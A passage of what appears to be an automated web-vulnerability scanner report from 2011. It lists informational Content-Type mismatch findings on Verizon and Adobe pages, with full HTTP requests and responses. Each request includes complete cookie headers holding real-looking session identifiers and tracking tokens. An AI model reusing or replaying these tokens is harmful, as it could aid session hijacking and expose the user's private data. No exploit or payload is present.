Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:35 GMT
ETag: W/"193cb-4e228aaf"
Vary: accept-encoding
Content-Length: 103371
Date: Mon, 05 Sep 2011 22:26:22 GMT
Connection: keep-alive

CWS
.0..x..}.|.....6{u..@y...:.....b.M...i...I..t..* KA...l.D...De...ED..q ........;..i.&~>..w.<7..{...s....&.....`E!.....;&..l..>....om2[.,.....p....[ZZ.Z..Y......O...>`@*.H%.,.}k......2("H..ds..
...[SNIP]...

26.21. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a Flash object.

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/LoginFlash.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:35 GMT
ETag: W/"faa-4e228aaf"
Vary: accept-encoding
Cache-Control: private, max-age=21778
Date: Mon, 05 Sep 2011 22:26:21 GMT
Content-Length: 4010
Connection: keep-alive

CWS
n...x..X{p..y.]....>.>@..(..H.&    ....(....EA&)[.M.............V..vb'q.I\{..,7mS.Mf..T....)n.I.dm7.Q..t:v;..c..O....@..e..b....}......g...!|.....1g=B..j.GhP.).ScA..T2........g..........U..v...{}~...
...[SNIP]...

26.22. http://get.adobe.com/cfusion/search/buddy/searchbuddy.cfm

Summary

Severity:   Information
Confidence:   Firm
Host:   http://get.adobe.com
Path:   /cfusion/search/buddy/searchbuddy.cfm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /cfusion/search/buddy/searchbuddy.cfm?pre=xs&s=get:flashplayer&loc=en_us HTTP/1.1
Host: get.adobe.com
Proxy-Connection: keep-alive
Referer: http://get.adobe.com/flashplayer/
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SETTINGS.LOCALE=en%5Fus; storeregion=; s_vi=[CS]v1|272F173A85013C4B-60000106C0356B2B[CE]; UID=408BD657%2DBBDF%2DB561%2D47843A1059325B5B; op537volumelicensinggum=a00c02502m278vr07v3a22278vr08138v87c9; AWID=172.26.150.8.1314799484806; company_history=%5B%5B%22http%3A//support.muse.adobe.com/muse%22%2C%22Muse%22%5D%5D; is_human=true; mbox=PC#1314797047557-324714.19#1316024271|session#1314813238023-632011#1314816531|disable#browser%20timeout#1314817080|check#true#1314814731; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1315279224659_929552","ru":"http://phones.verizonwireless.com/htc/thunderbolt/","r":"phones.verizonwireless.com","st":"","cp":{"downloads":"get"},"pv":2,"to":3.3,"c":"http://get.adobe.com/flashplayer/","lc":{"d0":{"v":2,"s":true,"e":2}},"cd":0,"sd":0,"f":1315279228499}

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:34 GMT
Server: JRun Web Server
Cache-Control: max-age=1800
Content-Type: text/html; charset=UTF-8
Set-Cookie: DylanApp-BigIP=1447851018.27680.0000; path=/
Content-Length: 32

{"SUGGESTIONS":[],"HUBLETS":[]}

26.23. http://get.adobe.com/cfusion/search/index.cfm

Summary

Severity:   Information
Confidence:   Firm
Host:   http://get.adobe.com
Path:   /cfusion/search/index.cfm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /cfusion/search/index.cfm?loc=en_us&term=xss HTTP/1.1
Host: get.adobe.com
Proxy-Connection: keep-alive
Referer: http://get.adobe.com/flashplayer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SETTINGS.LOCALE=en%5Fus; storeregion=; s_vi=[CS]v1|272F173A85013C4B-60000106C0356B2B[CE]; UID=408BD657%2DBBDF%2DB561%2D47843A1059325B5B; op537volumelicensinggum=a00c02502m278vr07v3a22278vr08138v87c9; AWID=172.26.150.8.1314799484806; company_history=%5B%5B%22http%3A//support.muse.adobe.com/muse%22%2C%22Muse%22%5D%5D; is_human=true; mbox=PC#1314797047557-324714.19#1316024271|session#1314813238023-632011#1314816531|disable#browser%20timeout#1314817080|check#true#1314814731; s_cc=true; fsr.s={"v":1,"rid":"1315279224659_929552","ru":"http://phones.verizonwireless.com/htc/thunderbolt/","r":"phones.verizonwireless.com","st":"","cp":{"downloads":"get"},"pv":2,"to":3.3,"c":"http://get.adobe.com/flashplayer/","lc":{"d0":{"v":2,"s":true,"e":2}},"cd":0,"sd":0,"f":1315279228499}; DylanApp-BigIP=1447851018.27680.0000; s_sq=mxmacromedia%3D%2526pid%253Dget.adobe.com%25253A%252520Flash%252520Player%25253A%252520en%25253A%252520Chrome%252520message%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fget.adobe.com%25252Fcfusion%25252Fsearch%25252Findex.cfm%25253Floc%25253Den_us%252526term%25253Dxss%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 22:20:38 GMT
Server: JRun Web Server
Content-Type: text/html; charset=UTF-8
Content-Length: 23494


        <div class="columns-2-aaB-aa center"><img src="http://wwwimages.adobe.com/www.adobe.com/images/shared/error_sm.gif" width="95" height="90" alt="Error" /></div>
        <div class="columns-2-aaB-B">
   
...[SNIP]...
<head>


               <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
       
       <meta http-equiv="Content-Language" content="en-us" />
...[SNIP]...

26.24. http://headlines.verizon.com/headlines/GetPoll

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/GetPoll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /headlines/GetPoll?action=checkVote&pollId=575 HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381; CP=null*; VISITORID=1597650297

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Length: 84
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:57 GMT
Connection: close
Vary: Accept-Encoding

{"response":{"status":"success","poll_choice":{"type":"poll_choice","null":"true"}}}

26.25. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/Core.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/js/com/bea/portal/tools/js/Core.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /headlines/js/com/bea/portal/tools/js/Core.jsp HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 83
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; path=/

__BEA.com.bea.portal.tools.js.Core.set('__BEA.request.contextPath', '/headlines')

26.26. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 1181
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/javascript; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:35 GMT
Connection: close
Set-Cookie: NEWSROOMDOTCOMAPPID=7bSLTlQhs2y2M1zZJrqhtyTDLWGScGvNhMT9hlxzfQnmhhvJsQzr!1136409313; path=/


__BEA.com.bea.portal.tools.js.Core.set("__BEA.com.bea.portal.tools.js.Constants", new Object())

<!-- value of request.getContextPath() -->
__BEA.com.bea.portal.tools.js.Constants.CONTEXT_PATH = '/he
...[SNIP]...

26.27. http://headlines.verizon.com/headlines/resources/images/featuredArticle.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/featuredArticle.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/featuredArticle.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Sun, 07 Oct 2007 02:16:14 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 1866
Date: Mon, 05 Sep 2011 22:42:51 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR.......q......#`....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx......6..m.&..R._T....{..j..{.C.K...v.$.[.C&a...l.}.;.I2Yb>y.??B8..4.....p..(.B~...........Z..P!...]....|
...[SNIP]...

26.28. http://headlines.verizon.com/headlines/resources/images/followUsOnTwitter.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/followUsOnTwitter.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/followUsOnTwitter.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Thu, 09 Sep 2010 00:11:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 2430
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...|..........q......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..    .IDATx..Y{.Tg.?.9s......Y`....+.d.S...KklK..H.......#eS..    ..j...H.A.lURMmX..6.Y.*.OX*m....sg.3;3w...w..s;.....c
...[SNIP]...

26.29. http://headlines.verizon.com/headlines/resources/images/navOff_02.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_02.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/navOff_02.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 368
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...&..........G......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....    .0...t.;B;..AG....:......PWp.f.G....H..` ....%g....O...(..S    `......VU......~..B-...w...... /.| ..r..
...[SNIP]...

26.30. http://headlines.verizon.com/headlines/resources/images/navOff_03.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_03.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/navOff_03.png HTTP/1.1
Host: headlines.verizon.com
